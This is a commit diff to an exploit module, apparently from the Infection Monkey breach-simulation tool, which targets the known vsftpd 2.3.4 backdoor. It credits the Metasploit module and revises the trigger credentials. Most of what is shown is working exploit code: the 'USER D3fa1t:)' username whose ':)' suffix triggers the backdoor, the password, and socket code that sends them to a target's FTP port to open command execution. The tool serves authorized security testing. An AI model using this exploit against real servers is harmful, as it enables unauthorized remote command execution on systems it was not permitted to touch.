Update vsftpd.py

Added information about the exploit at the top, and made slight change to the format of the string USERNAME & PASSWORD
2019-05-22 16:06:42 +02:00 · 2019-05-22 16:06:42 +02:00 · 38d8146c98
parent 595a089e60
commit 38d8146c98
1 changed files with 11 additions and 4 deletions
--- a/monkey/infection_monkey/exploit/vsftpd.py
+++ b/monkey/infection_monkey/exploit/vsftpd.py
@ -1,3 +1,10 @@
+"""
+    Implementation is based on VSFTPD v2.3.4 Backdoor Command Execution exploit by metasploit
+    https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
+    only vulnerable version is "2.3.4"
+"""
+
+
 import StringIO
 import logging
 import paramiko
@ -22,8 +29,8 @@ RECV_128            = 128               # In Bytes
 UNAME_M             = "uname -m"        
 ULIMIT_V            = "ulimit -v "      # To increase the memory limit
 UNLIMITED           = "unlimited;"
-USERNAME            = b'USER D3fa1t:)\n'# Ftp Username
-PASSWORD            = b'PASS please\n'  # Ftp Password
+USERNAME            = b'USER D3fa1t:)'  # Ftp Username should end with :) to trigger the backdoor
+PASSWORD            = b'PASS please'    # Ftp Password
 FTP_TIME_BUFFER     = 1                 # In seconds

 class VSFTPDExploiter(HostExploiter):
@ -65,9 +72,9 @@ class VSFTPDExploiter(HostExploiter):
        if self.socket_connect(ftp_socket, self.host.ip_addr, FTP_PORT):
            ftp_socket.recv(RECV_128).decode('utf-8')
        
-        if self.socket_send_recv(ftp_socket, USERNAME):
+        if self.socket_send_recv(ftp_socket, USERNAME + '\n'):
            time.sleep(FTP_TIME_BUFFER)
-            self.socket_send(ftp_socket, PASSWORD)
+            self.socket_send(ftp_socket, PASSWORD + '\n')
            ftp_socket.close()
            LOG.info('Backdoor Enabled, Now we can run commands')
        else: